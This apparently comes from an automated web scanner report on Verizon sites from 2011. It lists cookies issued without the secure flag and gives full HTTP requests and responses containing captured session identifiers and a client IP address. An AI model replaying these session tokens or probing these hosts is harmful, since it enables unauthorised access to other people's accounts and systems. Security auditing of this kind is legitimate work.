AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; CP=null*

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 410
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "19a-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7200
Date: Mon, 05 Sep 2011 22:40:49 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:40:49 GMT

GIF89a.............................................................................................................................................................vvvuuurrrllleeeddd...................
...[SNIP]...

6.35. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/s.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/s.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:43 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/s.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 43
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:56 GMT
ETag: "2b-4e228b00"
Accept-Ranges: bytes
Cache-Control: private, max-age=7184
Date: Mon, 05 Sep 2011 22:22:43 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:43 GMT

GIF89a.............!.......,...........D..;

6.36. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/tooltip_button.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/tooltip_button.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:25:25 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/tooltip_button.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/signIn.do?TYPE=33554433&REALMOID=06-3bc2b407-708d-100e-b8d8-80e9104e0217&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=yEpKvw2seAPol78XasYtX0XQ0z1SO8yMK6CDIkxTGYk63aSlmsHTzcEjfuEFE05q&TARGET=$SM$HTTPS%3a%2f%2fenterprisecenter%2everizon%2ecom%2fenterprisesolutions%2fglobal%2fgHome%2edo
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; CP=null*

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 133
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:56 GMT
ETag: "85-4e228b00"
Accept-Ranges: bytes
Cache-Control: private, max-age=7141
Date: Mon, 05 Sep 2011 22:25:25 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:25:25 GMT

GIF89a.... .............DDD...UUU...........................!..... .,.........20.@k.)..;......a..\a....hP.....1t)..%.....I..X....;

6.37. https://enterprisecenter.verizon.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:25:22 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html
Location: /enterprisesolutions/Default/favicon.ico
Vary: accept-encoding
Expires: Mon, 05 Sep 2011 22:25:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:25:22 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:25:22 GMT
Content-Length: 0

6.38. https://mblogin.verizonwireless.com/amserver/UI/Login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mblogin.verizonwireless.com
Path:	/amserver/UI/Login

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

SD=CARTCTR%3D0;Domain=.verizonwireless.com;Expires=Thu, 01-Jan-1970 00:00:10 GMT;Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /amserver/UI/Login HTTP/1.1
Host: mblogin.verizonwireless.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.39. https://signin.verizon.com/sso/VOLPortalLogin previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://signin.verizon.com
Path:	/sso/VOLPortalLogin

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

lob=consumer; domain=.verizon.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sso/VOLPortalLogin HTTP/1.1
Host: signin.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 05 Sep 2011 22:35:49 GMT
Server: Apache
Cache-Control: no-cache="Set-Cookie"
Set-Cookie: lob=consumer; domain=.verizon.com; path=/
Set-Cookie: dotcomsid=null; domain=.verizon.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
Set-Cookie: logout_url=null; domain=.verizon.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Location: https://signin.verizon.com/sso/RememberMeServlet
P3P: policyref="/p3p/w3c/p3p.xml", CP="CAO DSP COR CUR ADM TAI PSD IVAi IVDi OTPi OTRi STP PHY ONL UNI"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 291

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://signin.verizon.com/sso/Rem
...[SNIP]...

6.40. https://www22.verizon.com/FORYOURHOME/GOFLOW/employeeflow/EmpDiscountProgram.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/FORYOURHOME/GOFLOW/employeeflow/EmpDiscountProgram.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

EOrdering=AffinityCaptcha=NES6zYkqZVIXZHz3xATrXzO2Q%3d%3d; domain=.verizon.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FORYOURHOME/GOFLOW/employeeflow/EmpDiscountProgram.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 36780
Expires: Mon, 05 Sep 2011 22:38:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:38:01 GMT
Connection: close
Set-Cookie: ASP.NET_SessionId=; path=/
Set-Cookie: ASP.NET_SessionId=; path=/
Set-Cookie: EOrdering=AffinityCaptcha=NES6zYkqZVIXZHz3xATrXzO2Q%3d%3d; domain=.verizon.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
Ver
...[SNIP]...

6.41. https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; domain=.verizon.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX?CLIENT=RGA&CUSTTYPE=NEW&SMBBANNERID=ND~LECLS+3YR+1V HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://smallbusiness.verizon.com/products/voice/plans.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; CMS_TimeZoneOffset=300; PDSS=PflowId=680d1ca400d842e69be1848a9f3d28c5; DSS=flowId=f9688e84baaa4126acd87151b526b588; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; ContextInfo_TV=FiOSTV; ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=; IHAClientIP=112.64.2.103; RecentlyVisited=Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=VwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxAA==&IP=NQAwAC4AMgAzAC4AMQAyADMALgAxADAANgAsACAAOAAwAC4ANgA3AC4ANwA0AC4AMgAxADEALAAgADEAMQAyAC4ANgA0AC4AMQAuADEAMAA3AA==; vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=10010; BPSPANISH=N; CP=null*; refURL=https://www22.verizon.com/ForYourHome/VZRepair/vziha/Service.aspx?ihaweb=WebSTBFrozen; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d; urlreferer=http://smallbusiness.verizon.com/products/voice/plans.aspx; NSC_xxx22_gztncja_80_mcw=ffffffff895bc6ba45525d5f4f58455e445a4a423660

Response

6.42. https://www22.verizon.com/ForYourHome/GoFlow/MyVerizonNew/ACSLogin.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/ForYourHome/GoFlow/MyVerizonNew/ACSLogin.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

EOrdering=AffinityCaptcha=NES6zYkqZVIXZHz3xATrXzO2Q%3d%3d&STEP133=NESJBAz%2b%2bFRFcSze8KcWPLg9w%3d%3d&PROJNORTH-CLIENT=; domain=.verizon.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ForYourHome/GoFlow/MyVerizonNew/ACSLogin.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 31774
Expires: Mon, 05 Sep 2011 22:38:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:38:01 GMT
Connection: close
Set-Cookie: EOrdering=AffinityCaptcha=NES6zYkqZVIXZHz3xATrXzO2Q%3d%3d&STEP133=NESJBAz%2b%2bFRFcSze8KcWPLg9w%3d%3d&PROJNORTH-CLIENT=; domain=.verizon.com; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Verizon | Shop for Services | TV + Internet + Phone</title>
<meta na
...[SNIP]...

6.43. https://www22.verizon.com/ForYourHome/Goflow/MyVerizon/OneClick/MyVerizonAsync.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/ForYourHome/Goflow/MyVerizon/OneClick/MyVerizonAsync.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ak-sf=false; expires=Mon, 05-Sep-2011 22:47:02 GMT; path=/foryourhome/; domain=verizon.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ForYourHome/Goflow/MyVerizon/OneClick/MyVerizonAsync.aspx HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; PDSS=PflowId=680d1ca400d842e69be1848a9f3d28c5; DSS=flowId=f9688e84baaa4126acd87151b526b588; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=VwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxAA==&IP=NQAwAC4AMgAzAC4AMQAyADMALgAxADAANgAsACAAOAAwAC4ANgA3AC4ANwA0AC4AMgAxADEALAAgADEAMQAyAC4ANgA0AC4AMQAuADEAMAA3AA==; vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=10010; BPSPANISH=N; urlreferer=http://smallbusiness.verizon.com/products/voice/plans.aspx; NSC_xxx22_gztncja_80_mcw=ffffffff895bc6ba45525d5f4f58455e445a4a423660; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; SrcClientID=smallbusiness.verizon.com; vzAppID=; LOB_CATEGORY=; 